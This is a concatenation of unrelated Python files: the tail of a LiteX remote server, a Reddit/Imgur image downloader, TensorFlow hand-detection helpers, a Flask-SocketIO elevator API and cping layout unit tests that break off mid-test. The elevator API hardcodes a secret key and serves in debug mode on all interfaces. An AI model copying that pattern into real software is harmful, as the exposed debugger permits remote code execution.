print("Connected with " + addr[0] + ":" + str(addr[1]))
try:
while True:
try:
packet = self.receive_packet(client_socket)
if packet == 0:
break
except:
break
packet = EtherbonePacket(packet)
packet.decode()
record = packet.records.pop()
# Wait for lock
while self.lock:
time.sleep(0.01)
# Set lock
self.lock = True
# Handle writes:
if record.writes != None:
self.comm.write(record.writes.base_addr, record.writes.get_datas())
# Handle reads
if record.reads != None:
max_length = {
"CommUART": 256,
"CommUDP": 1,
}.get(self.comm.__class__.__name__, 1)
bursts = {
"CommUART": ["incr", "fixed"]
}.get(self.comm.__class__.__name__, ["incr"])
reads = []
for addr, length, burst in _read_merger(record.reads.get_addrs(),
max_length = max_length,
bursts = bursts):
reads += self.comm.read(addr, length, burst)
record = EtherboneRecord()
record.writes = EtherboneWrites(datas=reads)
record.wcount = len(record.writes)
packet = EtherbonePacket()
packet.records = [record]
packet.encode()
self.send_packet(client_socket, packet)
# release lock
self.lock = False
finally:
print("Disconnect")
client_socket.close()
def start(self, nthreads):
for i in range(nthreads):
self.serve_thread = threading.Thread(target=self._serve_thread)
self.serve_thread.setDaemon(True)
self.serve_thread.start()
# Run ----------------------------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="LiteX Server utility", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Common arguments
parser.add_argument("--bind-ip", default="localhost", help="Host bind address.")
parser.add_argument("--bind-port", default=1234, help="Host bind port.")
parser.add_argument("--debug", action="store_true", help="Enable debug.")
# UART arguments
parser.add_argument("--uart", action="store_true", help="Select UART interface.")
parser.add_argument("--uart-port", default=None, help="Set UART port.")
parser.add_argument("--uart-baudrate", default=115200, help="Set UART baudrate.")
# JTAG arguments
parser.add_argument("--jtag", action="store_true", help="Select JTAG interface.")
parser.add_argument("--jtag-config", default="openocd_xc7_ft232.cfg", help="OpenOCD JTAG configuration file.")
parser.add_argument("--jtag-chain", default=1, help="JTAG chain.")
# UDP arguments
parser.add_argument("--udp", action="store_true", help="Select UDP interface.")
parser.add_argument("--udp-ip", default="192.168.1.50", help="Set UDP remote IP address.")
parser.add_argument("--udp-port", default=1234, help="Set UDP remote port.")
parser.add_argument("--udp-scan", action="store_true", help="Scan network for available UDP devices.")
# PCIe arguments
parser.add_argument("--pcie", action="store_true", help="Select PCIe interface.")
parser.add_argument("--pcie-bar", default=None, help="Set PCIe BAR.")
# USB arguments
parser.add_argument("--usb", action="store_true", help="Select USB interface.")
parser.add_argument("--usb-vid", default=None, help="Set USB vendor ID.")
parser.add_argument("--usb-pid", default=None, help="Set USB product ID.")
parser.add_argument("--usb-max-retries", default=10, help="Number of USB reconecting retries.")
args = parser.parse_args()
# UART mode
if args.uart:
from litex.tools.remote.comm_uart import CommUART
if args.uart_port is None:
print("Need to specify --uart-port, exiting.")
exit()
uart_port = args.uart_port
uart_baudrate = int(float(args.uart_baudrate))
print("[CommUART] port: {} / baudrate: {} / ".format(uart_port, uart_baudrate), end="")
comm = CommUART(uart_port, uart_baudrate, debug=args.debug)
# JTAG mode
elif args.jtag:
from litex.tools.litex_term import JTAGUART
from litex.tools.remote.comm_uart import CommUART
jtag_uart = JTAGUART(config=args.jtag_config, chain=int(args.jtag_chain))
jtag_uart.open()
print("[CommUART] port: JTAG / ", end="")
comm = CommUART(os.ttyname(jtag_uart.name), debug=args.debug)
# UDP mode
elif args.udp:
from litex.tools.remote.comm_udp import CommUDP
udp_ip = args.udp_ip
udp_port = int(args.udp_port)
if args.udp_scan:
udp_ip = udp_ip.split(".")
assert len(udp_ip) == 4
udp_ip[3] = "x"
udp_ip = ".".join(udp_ip)
comm = CommUDP(udp_ip, udp_port, debug=args.debug)
comm.open(probe=False)
comm.scan(udp_ip)
comm.close()
exit()
else:
print("[CommUDP] ip: {} / port: {} / ".format(udp_ip, udp_port), end="")
comm = CommUDP(udp_ip, udp_port, debug=args.debug)
# PCIe mode
elif args.pcie:
from litex.tools.remote.comm_pcie import CommPCIe
pcie_bar = args.pcie_bar
if pcie_bar is None:
print("Need to speficy --pcie-bar, exiting.")
exit()
print("[CommPCIe] bar: {} / ".format(pcie_bar), end="")
comm = CommPCIe(pcie_bar, debug=args.debug)
# USB mode
elif args.usb:
from litex.tools.remote.comm_usb import CommUSB
if args.usb_pid is None and args.usb_vid is None:
print("Need to speficy --usb-vid or --usb-pid, exiting.")
exit()
print("[CommUSB] vid: {} / pid: {} / ".format(args.usb_vid, args.usb_pid), end="")
pid = args.usb_pid
if pid is not None:
pid = int(pid, base=0)
vid = args.usb_vid
if vid is not None:
vid = int(vid, base=0)
comm = CommUSB(vid=vid, pid=pid, max_retries=args.usb_max_retries, debug=args.debug)
else:
parser.print_help()
exit()
server = RemoteServer(comm, args.bind_ip, int(args.bind_port))
server.open()
server.start(4)
try:
import time
while True: time.sleep(100)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
|
main.py
|
import time
import os
import threading
import urllib.request
import json
import sys
import config
import praw
from slugify import slugify
from imgurpython import ImgurClient
reddit = praw.Reddit(client_id=config.client_id, client_secret=config.client_secret, user_agent=config.user_agent)
reddit.read_only = True # might not be needed at all.
client = ImgurClient(config.imgur_client_id, "")
commands = {
"run": "runs the image downloader once.",
"add <sub>": "add sub(s) to the list.",
"removesub <sub>": "remove sub from the list.",
"subs": "shows the subreddit where images are downloaded from.",
"count": "shows the amount of images totally downloaded.",
"exit": "exits the image downloader script.",
"album": "download one album",
"remove <sub>": "remove all images from one specific subreddit",
"suicide": "removes all images in specified folder."
}
filename = 'data.json'
# dumps to json file
def dump(prop, val):
with open(filename) as f:
data = json.load(f)
data[prop] = val
os.remove(filename)
with open(filename, 'w') as f:
json.dump(data, f, indent=4)
# reads from json file
def read(prop):
with open(filename) as json_file:
return json.load(json_file)[prop]
subreddits = read("subs")
if not subreddits:
print("\nYou haven't added any subs yet. Add them by doing \n\n add <sub> \n")
count = read("count")
limit = read("limit")
# save image
def save_img(link, name, sub=''):
global count
ext = '.jpg' if '.jpg' in link else '.png'
#id = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
filename = f"{slugify(name)}_{sub}{ext}"
path = os.path.join(config.path, filename)
try:
urllib.request.urlretrieve(link, path)
except Exception as e:
print(f"Request: {link}: failed: {str(e)}")
return
count += 1
# check if image exists
def img_exists(name, url):
ext = '.jpg' if '.jpg' in url else '.png'
if os.path.isfile(f"{config.path}/{name}{ext}"):
return True
# handles imgur albums
def alb_handler(url, sub):
# gets number after 4th '/'
alb_id = url.split("/")[4]
# try getting the album images
try:
imgs = client.get_album_images(alb_id)
except Exception as e:
print(f"album {alb_id} not found")
return
# if the album exists and there are no problems, save the images with save_img()
for x in imgs:
# check if image already exists
if img_exists(slugify(f"{str(x.datetime)}_{sub}"), x.link):
continue
save_img(x.link, str(x.datetime), sub)
# removes all images from specific sub
def removeimages(sub=''):
for _, _, filenames in os.walk(config.path):
for f in filenames:
try:
if sub is not '':
if sub in f:
os.remove(f"{config.path}/{f}")
else:
os.remove(f"{config.path}/{f}")
except:
print(f"{f} is in use, try a little later.")
pass
# the main thread for downloading the images
def img_thread(once=False):
while True:
for sub in subreddits:
try:
for submission in reddit.subreddit(sub).hot(limit=limit):
url = submission.url
if 'reddit.com/r/' in url or 'gifv' in url or 'gif' in url:
continue
if 'reddituploads' in url and '.jpg' not in url and '.png' not in url:
url += ".jpg"
if 'imgur.com/a/' in url or 'imgur.com/gallery/' in url:
alb_handler(url, sub)
continue
if 'imgur' in url and '.jpg' not in url and '.png' not in url:
url += ".jpg"
# check if image exists
if img_exists(f"{slugify(submission.title)}_{sub}", url):
continue
save_img(url, submission.title, sub)
except:
continue
time.sleep(0.1)
dump("count", count)
if once:
break
time.sleep(600)
# removes all images and files incase of emergency D:
def suicide():
removeimages()
# the thread for getting the input commands.
def inp_thread():
global subreddits
global limit
while True:
try:
inp = input("> ")
except EOFError:
os._exit(1)
if inp.startswith("add"):
temp_subreddits = inp.split(" ")[1:]
for sub in temp_subreddits:
subreddits.append(sub)
dump("subs", subreddits)
print(subreddits)
print("Running once...")
img_thread(once=True)
if inp.startswith("removesub"):
temp_subreddit = inp.split(" ")[1]
subreddits.remove(temp_subreddit)
dump("subs", subreddits)
print(subreddits)
if inp.startswith("limit"):
limit = int(inp.split(" ")[1])
dump("limit", limit)
if inp == "count":
print(read("count"))
if inp == "stats":
show_stats()
if inp == "subs":
print(subreddits)
if inp == "run":
img_thread(once=True)
if inp.startswith("album"):
alb_url = inp.split(" ")[1]
alb_handler(alb_url)
if inp.startswith("remove"):
sub = inp.split(" ")[1]
removeimages(sub)
if inp == "help":
for k, v in commands.items():
print(f"{k} - {v}")
if inp == "exit":
os._exit(1)
if inp == "suicide":
if input("You sure? (Y/N) ") == "Y":
suicide()
print("RIP.")
else:
continue
# all the tread calls.
if __name__ == "__main__":
t1 = threading.Thread(target=img_thread)
t2 = threading.Thread(target=inp_thread)
t1.start()
t2.start()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen infrerence graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.compat.v1.GraphDef()
with tf.io.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.compat.v1.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Actual detection .. generate scores and bounding boxes given an image
def gpu_detect_objects(image_np, detection_graph, sess):
gpus = tf.config.experimental.list_logical_devices('GPU')
if gpus:
for gpu in gpus:
# for gpu in ['/gpu:0', '/gpu:1']:
with tf.device(gpu.name):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
api_pipes.py
|
from multiprocessing import Process, Pipe
from flask_socketio import SocketIO, emit
from flask import Flask, render_template
import time
import json
data = {
'local_elevator': {
'up': False,
'down': False,
'floor': '--'
},
'express_elevator': {
'up': False,
'down': False,
'floor': '--'
}
}
app = Flask(__name__)
app.config['SECRET_KEY'] = '5b6db414d4fd764a'
socketio = SocketIO(app)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/api')
def api():
global data
return json.dumps(data)
@app.route('/log')
def log():
return "This is where the log will be!"
@socketio.on('connected')
def connected():
global data
emit('data', json.dumps(data))
def run_server(app, host, port, debug):
socketio.run(app, host=host, port=port, debug=debug)
def main(child_pipe):
Process(target=run_server, args=(app, '0.0.0.0', 5000, True)).start()
while True:
print('Before!')
recv = child_pipe.recv()
print(recv)
parse_floors_str(recv[0], recv[1])
print(data)
print('After!')
def parse_floors_str(local_elevator, express_elevator):
global data
try:
local_elevator = local_elevator.replace(' ', '')
express_elevator = express_elevator.replace(' ', '')
if '+' in local_elevator:
data['local_elevator']['up'] = True
data['local_elevator']['down'] = False
data['local_elevator']['floor'] = local_elevator.replace('+', '')
elif '-' in local_elevator:
data['local_elevator']['up'] = False
data['local_elevator']['down'] = True
data['local_elevator']['floor'] = local_elevator.replace('-', '')
else:
data['local_elevator']['up'] = False
data['local_elevator']['down'] = False
data['local_elevator']['floor'] = local_elevator
if '+' in express_elevator:
data['express_elevator']['up'] = True
data['express_elevator']['down'] = False
data['express_elevator']['floor'] = express_elevator.replace(
'+', '')
elif '-' in express_elevator:
data['express_elevator']['up'] = False
data['express_elevator']['down'] = True
data['express_elevator']['floor'] = express_elevator.replace(
'-', '')
else:
data['express_elevator']['up'] = False
data['express_elevator']['down'] = False
data['express_elevator']['floor'] = express_elevator
except:
print('Error occured in api.py!')
if __name__ == "__main__":
main()
|
test_modern.py
|
'''cping.layouts.modern tests'''
# pylint: disable=not-an-iterable,unsubscriptable-object
import curses
import threading
import unittest
import unittest.mock
import cping.layouts.modern
import cping.protocols
# Regarding `list(window.mock_calls[x])[0][y]`, this is a workaround to pre-3.8
class TestLayout(unittest.TestCase):
'''cping.layouts.modern.Layout tests.'''
@staticmethod
def wrap_curses_getch(keys):
'''Returns a callable that will return `keys` one at a time per call.
Once the keys are exhausted, 'q' is returned.'''
key_iterator = iter(keys)
def getch():
try:
return next(key_iterator)
except StopIteration:
return ord('q')
return getch
def setUp(self):
curses.init_pair = lambda *_: None
curses.color_pair = lambda x: x
def test___call__(self):
'''Confirm `__call__` calls `render`.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('1')
trigger = threading.Event()
layout.render = lambda x: x.set()
curses.wrapper = lambda x: x(trigger)
layout()
self.assertTrue(trigger.is_set())
def test_initialize_colors(self):
'''Confirm `initialize_colors` populates `Layout.colors`.'''
colors = ['green', 'red', 'yellow']
for color in colors:
self.assertIsNone(cping.layouts.modern.Layout.colors.get(color))
cping.layouts.modern.Layout.initialize_colors()
for color in colors:
self.assertIsNotNone(cping.layouts.modern.Layout.colors.get(color))
def test_render_sparkline(self):
'''`render_sparkline` should call `window.addstr`.'''
host = cping.protocols.Ping()('localhost')
host.add_result(-1)
host.add_result(0.1)
host.add_result(0.2, True)
host.add_result(-1)
window = unittest.mock.MagicMock()
cping.layouts.modern.Layout.render_sparkline(window, 1, 2, host, 3)
green = cping.layouts.modern.Layout.colors.get('green')
red = cping.layouts.modern.Layout.colors.get('red')
yellow = cping.layouts.modern.Layout.colors.get('yellow')
# The first result will not fit because of the length limit
self.assertEqual(len(window.mock_calls), 3)
self.assertEqual(list(window.mock_calls[0])[1][0], 1)
self.assertEqual(list(window.mock_calls[0])[1][1], 2)
self.assertEqual(list(window.mock_calls[0])[1][3], green)
self.assertEqual(list(window.mock_calls[1])[1][0], 1)
self.assertEqual(list(window.mock_calls[1])[1][1], 3)
self.assertEqual(list(window.mock_calls[1])[1][3], yellow)
self.assertEqual(list(window.mock_calls[2])[1][0], 1)
self.assertEqual(list(window.mock_calls[2])[1][1], 4)
self.assertEqual(list(window.mock_calls[2])[1][3], red)
def test_render_table(self):
'''`render_table` should call `window.erase`, `window.addnstr`, and
`window.refresh`.'''
host1 = cping.protocols.Ping()('host1')
host2 = cping.protocols.Ping()('host2')
table = cping.layouts.modern.get_table([host1, host2])
window = unittest.mock.MagicMock()
window.getmaxyx = lambda: (24, 80)
cping.layouts.modern.Layout.render_table(window, table, 0)
# Erase, 4x addnstr (header, 2x host, footer), refresh
self.assertEqual(len(window.mock_calls), 6)
# Erase at the begining and refresh at the end
self.assertEqual(unittest.mock.call.erase(), window.mock_calls[0])
self.assertEqual(unittest.mock.call.refresh(), window.mock_calls[5])
# The table is ordered correctly
self.assertTrue(list(window.mock_calls[1])[1][2].startswith(' HOST'))
self.assertTrue(list(window.mock_calls[2])[1][2].startswith('host1'))
self.assertTrue(list(window.mock_calls[3])[1][2].startswith('host2'))
self.assertTrue(list(window.mock_calls[4])[1][2].startswith(' PAGE'))
# The header is selected
header_attributes = list(window.mock_calls[1])[1][4]
self.assertEqual(header_attributes & curses.A_BOLD, curses.A_BOLD)
def test_render_table_curses_error_handling(self):
'''`render_table` should handle exceptions of `curses.error`.'''
def curses_error():
raise curses.error()
window = unittest.mock.MagicMock()
window.erase = curses_error
window.getmaxyx = lambda: (24, 80)
cping.layouts.modern.Layout.render_table(window, [], 0)
# The error canceled the rendering before any calls were made
self.assertEqual(len(window.mock_calls), 0)
def test_render(self):
'''Ensure `render` sets the timeout of the window and clears the input
buffers after `window.getch`.'''
def getch():
getch_trigger.wait()
return ord('q')
flushinp_trigger = threading.Event()
getch_trigger = threading.Event()
window = unittest.mock.MagicMock()
window.getch = getch
window.getmaxyx = lambda: (24, 80)
curses.flushinp = flushinp_trigger.set
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
renderer = threading.Thread(target=layout.render, args=(window, ))
renderer.start()
# Input buffers are flushed after `window.getch`
self.assertFalse(flushinp_trigger.is_set())
getch_trigger.set()
self.assertTrue(flushinp_trigger.wait(0.5))
# Wait for the 'q' key to get processed once `getch_trigger` is set
renderer.join()
# Window timeout is set to the protocol interval
interval = layout.protocol.interval * 1000
self.assertIn(unittest.mock.call.timeout(interval), window.mock_calls)
def test_render_function_burst_mode(self):
'''Enable/disable burst mode on a single host.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('host1')
layout.add_host('host2')
for host in layout.hosts:
host.burst_mode.set = unittest.mock.MagicMock()
host.burst_mode.clear = unittest.mock.MagicMock()
keys = [curses.KEY_DOWN, ord('b')]
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch(keys)
window.getmaxyx = lambda: (24, 80)
layout.render(window)
# Both hosts are cleared, but only host1 would've been set
self.assertTrue(layout.hosts[0].burst_mode.set.called)
self.assertFalse(layout.hosts[1].burst_mode.set.called)
self.assertTrue(layout.hosts[0].burst_mode.clear.called)
self.assertTrue(layout.hosts[1].burst_mode.clear.called)
def test_render_function_burst_mode_all(self):
'''Enable/disable burst mode on all hosts.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('host1')
layout.add_host('host2')
for host in layout.hosts:
host.burst_mode.set = unittest.mock.MagicMock()
host.burst_mode.clear = unittest.mock.MagicMock()
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch([])
window.getmaxyx = lambda: (24, 80)
layout.render(window)
# If no function matched, the default will clear burst mode
for host in layout.hosts:
self.assertTrue(host.burst_mode.clear.called)
host.burst_mode.clear.reset_mock()
self.assertFalse(host.burst_mode.clear.called)
window.getch = TestLayout.wrap_curses_getch([ord('b')])
layout.render(window)
# Burst mode will be cleared at the end
for host in layout.hosts:
self.assertTrue(host.burst_mode.set.called)
self.assertTrue(host.burst_mode.clear.called)
def test_render_function_change_selection(self):
'''Ensure the selection changes but doesn't go out of the table bounds.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('1')
keys = [curses.KEY_DOWN, curses.KEY_DOWN, curses.KEY_UP, curses.KEY_UP]
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch(keys)
function = 'cping.layouts.modern.Layout.render_table'
with unittest.mock.patch(function) as mock:
layout.render(window)
# Startup table render (selection at 0). Key down twice, selection
# at 1; reached bottom. Key up twice, selection at 0; reached top
for call, selection in zip(mock.call_args_list, [0, 1, 1, 0, 0]):
self.assertEqual(list(call)[0][2], selection)
def test_render_function_sort(self):
'''Ensure accepted sort keys are between 0 and 6.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
keys = [ord(str(x)) for x in range(8)]
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch(keys)
window.getmaxyx = lambda: (24, 80)
function = 'cping.layouts.modern.get_table_sort_key'
with unittest.mock.patch(function) as mock:
mock.return_value = 1
layout.render(window)
# 0 to 6 are accepted, 7 is ignored
self.assertEqual(len(mock.call_args_list), 7)
for call, sort_key in zip(mock.call_args_list, range(7)):
self.assertEqual(list(call)[0][0], sort_key)
def test_render_function_start_stop(self):
'''Start/stop a single host.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('host1')
layout.add_host('host2')
for host in layout.hosts:
host.start = unittest.mock.MagicMock()
host.stop = unittest.mock.MagicMock()
keys = [curses.KEY_DOWN, ord('s')]
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch(keys)
window.getmaxyx = lambda: (24, 80)
layout.render(window)
# Only host1 should be started
self.assertTrue(layout.hosts[0].start.called)
self.assertFalse(layout.hosts[1].start.called)
# Mark the hosts as running
for host in layout.hosts:
host.is_running = unittest.mock.MagicMock(return_value=True)
window.getch = TestLayout.wrap_curses_getch(keys)
layout.render(window)
# Only host1 should be stopped
self.assertTrue(layout.hosts[0].stop.called)
self.assertFalse(layout.hosts[1].stop.called)
def test_render_function_start_stop_all(self):
'''Start/stop all hosts.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('host1')
layout.add_host('host2')
for host in layout.hosts:
host.start = unittest.mock.MagicMock()
host.stop = unittest.mock.MagicMock()
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch([ord('s')])
window.getmaxyx = lambda: (24, 80)
layout.render(window)
# Hosts were not running; should be started
for host in layout.hosts:
self.assertTrue(host.start.called)
# Mark the hosts as running
for host in layout.hosts:
host.is_running = unittest.mock.MagicMock(return_value=True)
window.getch = TestLayout.wrap_curses_getch([ord('s')])
layout.render(window)
# Hosts were running; should be stopped
for host in layout.hosts:
self.assertTrue(host.stop.called)
class TestGetHostColumns(unittest.TestCase):
'''cping.layouts.modern.get_host_columns tests.'''
def test_no_results(self):
'''A host with no results should return place-holders in the stats.'''
host = cping.protocols.Ping()('hi')
columns = cping.layouts.modern.get_host_columns(host)
expected = ['hi'] + (['- '] * 5)
self.assertEqual(columns, expected)
def test_results(self):
'''Stats should have 2 decimal places, or a percentage for `loss`.'''
host = cping.protocols.Ping()('hi')
host.add_result(-1)
host.add_result(0.1)
host.add_result(0.2)
host.add_result(0.3)
columns = cping.layouts.modern.get_host_columns(host)
expected = ['hi', '100.00', '200.00', '300.00', '100.00', '25% ']
self.assertEqual(columns, expected)
class TestGetTablePage(unittest.TestCase):
'''cping.layouts.modern.get_table_page tests.'''
def test_single_page(self):
'''A page size that shows the entire table.'''
table = list(range(10))
size = 10
selection = 5
page = cping.layouts.modern.get_table_page(table, size, selection)
self.assertEqual(page, table)
def test_multiple_page(self):
'''A size smaller than the table length should paginate.'''
table = list(range(10))
size = 3
selection = 5
page = cping.layouts.modern.get_table_page(table, size, selection)
self.assertEqual(page, table[3:6])
class TestGetTable(unittest.TestCase):
'''cping.layouts.modern.get_table tests.'''
def test_column_width(self):
'''The columns should all have equal lengths among the rows.'''
hosts = [cping.protocols.Ping()(str(x)) for x in range(3)]
table = cping.layouts.modern.get_table(hosts)
hosts[0].add_result(1000)
for index, column in enumerate(table[0]['columns']):
column_width = len(column)
for row in table:
self.assertEqual(len(row['columns'][index]), column_width)
def test_header(self):
'''Confirm the table starts with the header.'''
hosts = [cping.protocols.Ping()(str(x)) for x in range(3)]
table = cping.layouts.modern.get_table(hosts)
header = ['HOST', 'MIN', 'AVG', 'MAX', 'STD', 'LOSS']
self.assertEqual(len(table), len(hosts) + 1)
self.assertEqual(table[0]['line'].split(), header)
def test_host_running(self):
'''A running host should have different attributes than a stopped one.'''
host1 = cping.protocols.Ping()('1')
host2 = cping.protocols.Ping()('2')
trigger = threading.Event()
host1.protocol.ping_loop = lambda _: trigger.wait()
host1.start()
table = cping.layouts.modern.get_table([host1, host2])
trigger.set()
self.assertNotEqual(table[1]['attrs'], table[2]['attrs'])
def test_host_status(self):
'''Host status should be included in the table.'''
host = cping.protocols.Ping()('1')
host.status = 'Some status'
table = cping.layouts.modern.get_table([host])
self.assertIn(host.status, table[1]['line'])
class TestGetTableSortKey(unittest.TestCase):
'''cping.layouts.modern.get_table_sort_key tests.'''
def test_cycle(self):
'''Sorting key should cylce between asc->desc->none->asc->...'''
self.assertEqual(cping.layouts.modern.get_table_sort_key(1, None), 1)
self.assertEqual(cping.layouts.modern.get_table_sort_key(1, 1), -1)
self.assertEqual(cping.layouts.modern.get_table_sort_key(1, -1), 0)
def test_different_leads_to_ascending(self):
'''Different sorting key than current leads to ascending of the new key.'''
self.assertEqual(cping.layouts.modern.get_table_sort_key(2, 1), 2)
self.assertEqual(cping.layouts.modern.get_table_sort_key(2, -1), 2)
class TestSortHosts(unittest.TestCase):
'''cping.layouts.modern.sort_hosts tests.'''
def setUp(self):
# min=1000, avg=2000, max=3000, stdev=1000, loss=0.0
self.host1 = cping.protocols.Ping()('host1')
self.host1.add_result(1)
self.host1.add_result(2)
self.host1.add_result(3)
# min=3000, avg=3500, max=4000, stdev=707.10, loss=0.33
self.host2 = cping.protocols.Ping()('host22')
self.host2.add_result(3)
self.host2.add_result(4)
self.host2.add_result(-1)
# min=500, avg=700, max=900, stdev=200, loss=0.25
self.host3 = cping.protocols.Ping()('host3')
self.host3.add_result(0.5)
self.host3.add_result(0.7)
self.host3.add_result(0.9)
self.host3.add_result(-1)
def test_no_results(self):
'''Sorting with a host that has no results.'''
empty_host = cping.protocols.Ping()('host3')
hosts = [self.host1, empty_host, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 2)
self.assertEqual(sorted_hosts, [self.host1, self.host2, empty_host])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -2)
self.assertEqual(sorted_hosts, [empty_host, self.host2, self.host1])
def test_no_sorting(self):
'''Sorting key 0, or an invalid key, will not change the order.'''
hosts = [self.host3, self.host1, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 0)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, None)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 7)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
def test_sorting_host(self):
'''Sorting key 1 will sort by str(host).'''
hosts = [self.host3, self.host1, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 1)
self.assertEqual(sorted_hosts, [self.host1, self.host3, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -1)
self.assertEqual(sorted_hosts, [self.host2, self.host3, self.host1])
def test_sorting_min(self):
'''Sorting key 2 will sort by the minimum statistic.'''
hosts = [self.host1, self.host2, self.host3]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 2)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -2)
self.assertEqual(sorted_hosts, [self.host2, self.host1, self.host3])
def test_sorting_max(self):
'''Sorting key 3 will sort by the maximum statistic.'''
hosts = [self.host1, self.host2, self.host3]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 3)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -3)
